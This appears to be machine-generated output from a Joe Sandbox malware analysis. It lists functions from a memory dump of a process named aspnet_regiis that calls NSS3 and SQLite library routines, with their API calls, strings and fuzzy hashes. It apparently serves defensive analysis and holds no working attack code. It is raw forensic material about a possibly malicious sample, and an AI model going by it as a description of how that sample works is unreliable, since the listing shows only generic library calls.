Instruction ID: 4325cd63178f56d222c2e720974b426cf96e95905eb3257e136b444d3779b30f
Opcode Fuzzy Hash: d41cb8c2821c073dd272ed7f0ae137b0e3fad56381339736505ca52d327d4627
Instruction Fuzzy Hash: 7E2106346011449BDB00EB249D59F9E37F5EB4632DF464429E41997F12DB349809CFEB

Function 6C40ECE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6C40DE64), ref: 6C40ED0C
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C40ED22

Part of subcall function 6C41B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C4F18D0,?), ref: 6C41B095

PL_FreeArenaPool.NSS3(?), ref: 6C40ED4A
PL_FinishArenaPool.NSS3(?), ref: 6C40ED6B
PR_CallOnce.NSS3(6C522AA4,6C4212D0), ref: 6C40ED38

Part of subcall function 6C344C70: TlsGetValue.KERNEL32(?,?,?,6C343921,6C5214E4,6C48CC70), ref: 6C344C97
Part of subcall function 6C344C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C343921,6C5214E4,6C48CC70), ref: 6C344CB0
Part of subcall function 6C344C70: PR_Unlock.NSS3(?,?,?,?,?,6C343921,6C5214E4,6C48CC70), ref: 6C344CC9

SECOID_FindOID_Util.NSS3(?), ref: 6C40ED52
PR_CallOnce.NSS3(6C522AA4,6C4212D0), ref: 6C40ED83
PL_FreeArenaPool.NSS3(?), ref: 6C40ED95
PL_FinishArenaPool.NSS3(?), ref: 6C40ED9D

Part of subcall function 6C4264F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6C42127C,00000000,00000000,00000000), ref: 6C42650E

Strings

security, xrefs: 6C40ED06

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
String ID: security
API String ID: 3323615905-3315324353
Opcode ID: 5db8dc144496951dd6ada992cb1ea5e8c2c0392721c63339ff3dceb622ce6fc7
Instruction ID: 156250e7191c84180558ee2efee715738b46b5822ff51c5ab5683ef345a72651
Opcode Fuzzy Hash: 5db8dc144496951dd6ada992cb1ea5e8c2c0392721c63339ff3dceb622ce6fc7
Instruction Fuzzy Hash: BE113875A402056AD710D721AC86FBB72B8EF4160DF050438E8D0A2F80F769A519C6EA

Function 6C4D0EB0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(Aborting,?,6C3B2357), ref: 6C4D0EB8
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(6C3B2357), ref: 6C4D0EC0
PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6C4D0EE6

Part of subcall function 6C4D09D0: PR_Now.NSS3 ref: 6C4D0A22
Part of subcall function 6C4D09D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C4D0A35
Part of subcall function 6C4D09D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C4D0A66
Part of subcall function 6C4D09D0: PR_GetCurrentThread.NSS3 ref: 6C4D0A70
Part of subcall function 6C4D09D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C4D0A9D
Part of subcall function 6C4D09D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C4D0AC8
Part of subcall function 6C4D09D0: PR_vsmprintf.NSS3(?,?), ref: 6C4D0AE8
Part of subcall function 6C4D09D0: EnterCriticalSection.KERNEL32(?), ref: 6C4D0B19
Part of subcall function 6C4D09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C4D0B48
Part of subcall function 6C4D09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C4D0C76
Part of subcall function 6C4D09D0: PR_LogFlush.NSS3 ref: 6C4D0C7E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6C4D0EFA

Part of subcall function 6C3BAEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6C3BAF0E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C4D0F16
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C4D0F1C
DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C4D0F25
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C4D0F2B

Strings

Aborting, xrefs: 6C4D0EB3
Assertion failure: %s, at %s:%d, xrefs: 6C4D0ED9, 6C4D0EE5, 6C4D0F06, 6C4D0F0B

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: DebugPrintR_snprintf__acrt_iob_funcabort$BreakCriticalCurrentEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime__stdio_common_vfprintffflush
String ID: Aborting$Assertion failure: %s, at %s:%d
API String ID: 3905088656-1374795319
Opcode ID: bcb3398d23c95b0c0a39c929aed5a07c60fd1eee9f7112b541b6eea28049fb63
Instruction ID: 9807b828c2c7f1aecdadff4368b04a240f8992d0fc42f0b7a2961393920372cd
Opcode Fuzzy Hash: bcb3398d23c95b0c0a39c929aed5a07c60fd1eee9f7112b541b6eea28049fb63
Instruction Fuzzy Hash: EBF04FB59001587BEA017B609C4FC9B3E2DDF86664F054438FE0956A02DB36F91496FA

Function 6C434DB0 Relevance: 16.9, APIs: 11, Instructions: 395memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000400), ref: 6C434DCB

Part of subcall function 6C420FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C3C87ED,00000800,6C3BEF74,00000000), ref: 6C421000
Part of subcall function 6C420FF0: PR_NewLock.NSS3(?,00000800,6C3BEF74,00000000), ref: 6C421016
Part of subcall function 6C420FF0: PL_InitArenaPool.NSS3(00000000,security,6C3C87ED,00000008,?,00000800,6C3BEF74,00000000), ref: 6C42102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6C434DE1

Part of subcall function 6C4210C0: TlsGetValue.KERNEL32(?,6C3C8802,00000000,00000008,?,6C3BEF74,00000000), ref: 6C4210F3
Part of subcall function 6C4210C0: EnterCriticalSection.KERNEL32(?,?,6C3C8802,00000000,00000008,?,6C3BEF74,00000000), ref: 6C42110C
Part of subcall function 6C4210C0: PL_ArenaAllocate.NSS3(?,?,?,6C3C8802,00000000,00000008,?,6C3BEF74,00000000), ref: 6C421141
Part of subcall function 6C4210C0: PR_Unlock.NSS3(?,?,?,6C3C8802,00000000,00000008,?,6C3BEF74,00000000), ref: 6C421182
Part of subcall function 6C4210C0: TlsGetValue.KERNEL32(?,6C3C8802,00000000,00000008,?,6C3BEF74,00000000), ref: 6C42119C

PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6C434DFF
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C434E59

Part of subcall function 6C41FAB0: free.MOZGLUE(?,-00000001,?,?,6C3BF673,00000000,00000000), ref: 6C41FAC7

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C4F300C,00000000), ref: 6C434EB8
SECOID_FindOID_Util.NSS3(?), ref: 6C434EFF
memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6C434F56
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C43521A

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
String ID:
API String ID: 1025791883-0
Opcode ID: 8112f24315c02aa3b0b32f66bd77d56f4e7f795bdc294dc1721c9afec96532bd
Instruction ID: ed44dc0b5d5063db07347e57c223ad900d225856ead918961fb9e04d69071554
Opcode Fuzzy Hash: 8112f24315c02aa3b0b32f66bd77d56f4e7f795bdc294dc1721c9afec96532bd
Instruction Fuzzy Hash: F0F19D71E002158BDB04CF55D840FADBBB2FF88359F255169E819AB780E736E982CF90

Function 6C3C4FD0 Relevance: 16.6, APIs: 11, Instructions: 112COMMON

Download Yara Rule

APIs

PR_NewLock.NSS3(00000001,00000000,6C510148,?,6C3D6FEC), ref: 6C3C502A
PR_NewLock.NSS3(00000001,00000000,6C510148,?,6C3D6FEC), ref: 6C3C5034
PL_NewHashTable.NSS3(00000000,6C41FE80,6C41FD30,6C46C350,00000000,00000000,00000001,00000000,6C510148,?,6C3D6FEC), ref: 6C3C5055
PL_NewHashTable.NSS3(00000000,6C41FE80,6C41FD30,6C46C350,00000000,00000000,?,00000001,00000000,6C510148,?,6C3D6FEC), ref: 6C3C506D

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: HashLockTable
String ID:
API String ID: 3862423791-0
Opcode ID: ef2f5a5d00f7f3d121470ae9f759db313de8c26ca59e2c73842c56fffd80f188
Instruction ID: 78bcd410af421712e2d80110985ea8bf061c1555490d3b985ee54b26e7f255ee
Opcode Fuzzy Hash: ef2f5a5d00f7f3d121470ae9f759db313de8c26ca59e2c73842c56fffd80f188
Instruction Fuzzy Hash: 3B31D3B9B152209BEF009A658C0DF5B36F89B1372CF464124EE05C7A40D37A9A08CFE7

Function 6C362E50 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 282COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,?), ref: 6C362F3D
memset.VCRUNTIME140(?,00000000,?), ref: 6C362FB9
memcpy.VCRUNTIME140(?,00000000,?), ref: 6C363005
memcpy.VCRUNTIME140(?,?,?), ref: 6C3630EE
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C363131
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001086C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C363178

Strings

database corruption, xrefs: 6C36316C
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C363022, 6C363156, 6C363162, 6C36318A, 6C363196, 6C3631A2, 6C3631AE, 6C3631BA, 6C3631C6
%s at line %d of [%.10s], xrefs: 6C363171

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: memcpy$memsetsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 984749767-598938438
Opcode ID: 6464665acf5d3ca44b0f88f8914cb44158f7f68cc397fb39f9b0d9970819fecb
Instruction ID: 8e98a47c91ff16f389a00de2bd10c0e2ec34e08ad157482c1e79483d12ed1dfe
Opcode Fuzzy Hash: 6464665acf5d3ca44b0f88f8914cb44158f7f68cc397fb39f9b0d9970819fecb
Instruction Fuzzy Hash: 75B1B170E052199BDB08DF9EC884AEEB7B1BF49304F14402DE845BBB49D775A941CFA4

Function 6C3B2D20 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 183COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 6C3B2D69

Strings

winTruncate2, xrefs: 6C3B2EF8
winUnmapfile2, xrefs: 6C3B2F7F
winTruncate1, xrefs: 6C3B2EBE
winSeekFile, xrefs: 6C3B2E9C
Ml, xrefs: 6C3B2DD0
winUnmapfile1, xrefs: 6C3B2F55
PMl, xrefs: 6C3B2E74, 6C3B2EC5, 6C3B2F32, 6C3B2F5C
@Ml, xrefs: 6C3B2E24

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: __allrem
String ID: @Ml$PMl$winSeekFile$winTruncate1$winTruncate2$winUnmapfile1$winUnmapfile2$Ml
API String ID: 2933888876-2130007168
Opcode ID: 45d267a87b1b61bc02ce049bd52a86f75785dd691325839a2d3a144c4545377f
Instruction ID: e654de8b3db85a1e3ce61e281ec180356a2e4a9417c9dd7b7e0ecf9b94ab52c2
Opcode Fuzzy Hash: 45d267a87b1b61bc02ce049bd52a86f75785dd691325839a2d3a144c4545377f
Instruction Fuzzy Hash: CC61A071B002049FDB04CF64DC98EAA77F1FB49354F10822CE915ABB90EB32A906CF95

Function 6C3B69A0 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 162COMMON

Download Yara Rule

APIs

Part of subcall function 6C34CA30: EnterCriticalSection.KERNEL32(?,?,?,6C3AF9C9,?,6C3AF4DA,6C3AF9C9,?,?,6C37369A), ref: 6C34CA7A
Part of subcall function 6C34CA30: LeaveCriticalSection.KERNEL32(?), ref: 6C34CB26

memset.VCRUNTIME140(00000000,00000000,?), ref: 6C3B6A02
EnterCriticalSection.KERNEL32(?), ref: 6C3B6AA6
LeaveCriticalSection.KERNEL32(?), ref: 6C3B6AF9
sqlite3_free.NSS3(00000000), ref: 6C3B6B15
sqlite3_log.NSS3(0000001B,delayed %dms for lock/sharing conflict at line %d,?,0000BCCC), ref: 6C3B6BA6

Strings

delayed %dms for lock/sharing conflict at line %d, xrefs: 6C3B6B9F
winDelete, xrefs: 6C3B6B71
`Ml, xrefs: 6C3B6A53
PMl, xrefs: 6C3B6B1F

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: CriticalSection$EnterLeave$memsetsqlite3_freesqlite3_log
String ID: PMl$`Ml$delayed %dms for lock/sharing conflict at line %d$winDelete
API String ID: 1816828315-2043488771
Opcode ID: 467af3534e3de351566229644187ce34c816eb6f1019a35f98d6dd5482d9bc02
Instruction ID: 7bb65341dce5f729a146956f739d1b452fe08ed222388587f661c287ce1e754a
Opcode Fuzzy Hash: 467af3534e3de351566229644187ce34c816eb6f1019a35f98d6dd5482d9bc02
Instruction Fuzzy Hash: 8751F031B001009FEF0CEB65DC5EEBE77B9AF96314B054128E916EAE80DB759901CF96

Function 6C3C0F30 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85memoryCOMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C3C0F62
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C3C0F84

Part of subcall function 6C41B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C4F18D0,?), ref: 6C41B095

SEC_QuickDERDecodeItem_Util.NSS3(?,6C3DF59B,6C4E890C,?), ref: 6C3C0FA8
PORT_Alloc_Util.NSS3(4C8B1474), ref: 6C3C0FC1

Part of subcall function 6C420BE0: malloc.MOZGLUE(6C418D2D,?,00000000,?), ref: 6C420BF8
Part of subcall function 6C420BE0: TlsGetValue.KERNEL32(6C418D2D,?,00000000,?), ref: 6C420C15

memcpy.VCRUNTIME140(00000000,?,4C8B1474), ref: 6C3C0FDB
PR_CallOnce.NSS3(6C522AA4,6C4212D0), ref: 6C3C0FEF
PL_FreeArenaPool.NSS3(?), ref: 6C3C1001
PL_FinishArenaPool.NSS3(?), ref: 6C3C1009

Strings

security, xrefs: 6C3C0F5C

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: ArenaPoolUtil$DecodeItem_Quick$Alloc_CallErrorFinishFreeInitOnceValuemallocmemcpy
String ID: security
API String ID: 2061345354-3315324353
Opcode ID: cf1444ce02d4774bb4820473b954b7d01bcecf28a06f9d4aeaddf5696cbeef22
Instruction ID: 5ad9e3545b8feeac1c01cbd090be6721988e5984e68d53f8f19dbe9797108af8
Opcode Fuzzy Hash: cf1444ce02d4774bb4820473b954b7d01bcecf28a06f9d4aeaddf5696cbeef22
Instruction Fuzzy Hash: 1521F2B1904244ABE701DF24DC41EAEBBB4EF48258F048518FC589AA01F732E955CBE2

Function 6C3C6DB0 Relevance: 15.2, APIs: 10, Instructions: 200memoryCOMMON

Download Yara Rule

APIs

SECITEM_ArenaDupItem_Util.NSS3(?,6C3C7D8F,6C3C7D8F,?,?), ref: 6C3C6DC8

Part of subcall function 6C41FDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6C41FE08
Part of subcall function 6C41FDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6C41FE1D
Part of subcall function 6C41FDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6C41FE62

PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6C3C7D8F,?,?), ref: 6C3C6DD5

Part of subcall function 6C4210C0: TlsGetValue.KERNEL32(?,6C3C8802,00000000,00000008,?,6C3BEF74,00000000), ref: 6C4210F3
Part of subcall function 6C4210C0: EnterCriticalSection.KERNEL32(?,?,6C3C8802,00000000,00000008,?,6C3BEF74,00000000), ref: 6C42110C
Part of subcall function 6C4210C0: PL_ArenaAllocate.NSS3(?,?,?,6C3C8802,00000000,00000008,?,6C3BEF74,00000000), ref: 6C421141
Part of subcall function 6C4210C0: PR_Unlock.NSS3(?,?,?,6C3C8802,00000000,00000008,?,6C3BEF74,00000000), ref: 6C421182
Part of subcall function 6C4210C0: TlsGetValue.KERNEL32(?,6C3C8802,00000000,00000008,?,6C3BEF74,00000000), ref: 6C42119C

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C4E8FA0,00000000,?,?,?,?,6C3C7D8F,?,?), ref: 6C3C6DF7

Part of subcall function 6C41B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C4F18D0,?), ref: 6C41B095

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C3C6E35

Part of subcall function 6C41FDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6C41FE29
Part of subcall function 6C41FDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6C41FE3D
Part of subcall function 6C41FDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6C41FE6F

PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C3C6E4C

Part of subcall function 6C4210C0: PL_ArenaAllocate.NSS3(?,6C3C8802,00000000,00000008,?,6C3BEF74,00000000), ref: 6C42116E

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C4E8FE0,00000000), ref: 6C3C6E82

Part of subcall function 6C3C6AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6C3CB21D,00000000,00000000,6C3CB219,?,6C3C6BFB,00000000,?,00000000,00000000,?,?,?,6C3CB21D), ref: 6C3C6B01
Part of subcall function 6C3C6AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6C3C6B8A

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C3C6F1E
PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C3C6F35
SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C4E8FE0,00000000), ref: 6C3C6F6B
PR_SetError.NSS3(FFFFE005,00000000,6C3C7D8F,?,?), ref: 6C3C6FE1

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
String ID:
API String ID: 587344769-0
Opcode ID: 9f9aec5e0a07588012b7857407b38f0c39baacad635ef3198b4ec0e1c9408bfd
Instruction ID: 4a0990b60aea8167c3ee6106cfc9c94aab02c110e6aa25ef24155bf49bb5e462
Opcode Fuzzy Hash: 9f9aec5e0a07588012b7857407b38f0c39baacad635ef3198b4ec0e1c9408bfd
Instruction Fuzzy Hash: 6F717D71E146469FEB00CF25CD40EBEBBB8BF94248F154229E848D7B11E771E994CB92

Function 6C400FE0 Relevance: 15.2, APIs: 10, Instructions: 192memorystringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C401057
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C401085
PK11_GetAllTokens.NSS3 ref: 6C4010B1
free.MOZGLUE(?), ref: 6C401107
PR_SetError.NSS3(00000000,00000000), ref: 6C401172
free.MOZGLUE(?), ref: 6C401182
free.MOZGLUE(?), ref: 6C4011A6
SECITEM_ItemsAreEqual_Util.NSS3(?,?), ref: 6C4011C5

Part of subcall function 6C4052C0: TlsGetValue.KERNEL32(?,00000001,00000002,?,?,?,?,?,?,?,?,?,?,6C3DEAC5,00000001), ref: 6C4052DF
Part of subcall function 6C4052C0: EnterCriticalSection.KERNEL32(?), ref: 6C4052F3
Part of subcall function 6C4052C0: PR_Unlock.NSS3(?), ref: 6C405358

PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C4011D3
PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C4011F3

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Utilfree$Alloc_Error$CriticalEnterEqual_ItemsK11_SectionTokensUnlockValuestrlen
String ID:
API String ID: 1549229083-0
Opcode ID: be549685e13c55bc99bacdd1ff33ffd9b519cc62d96cead4d1bfbf3a46e830ba
Instruction ID: aef4a0ec3c5538f16259e5d75245a7a47cc3385e9f4ce261362b21f80d0ded26
Opcode Fuzzy Hash: be549685e13c55bc99bacdd1ff33ffd9b519cc62d96cead4d1bfbf3a46e830ba
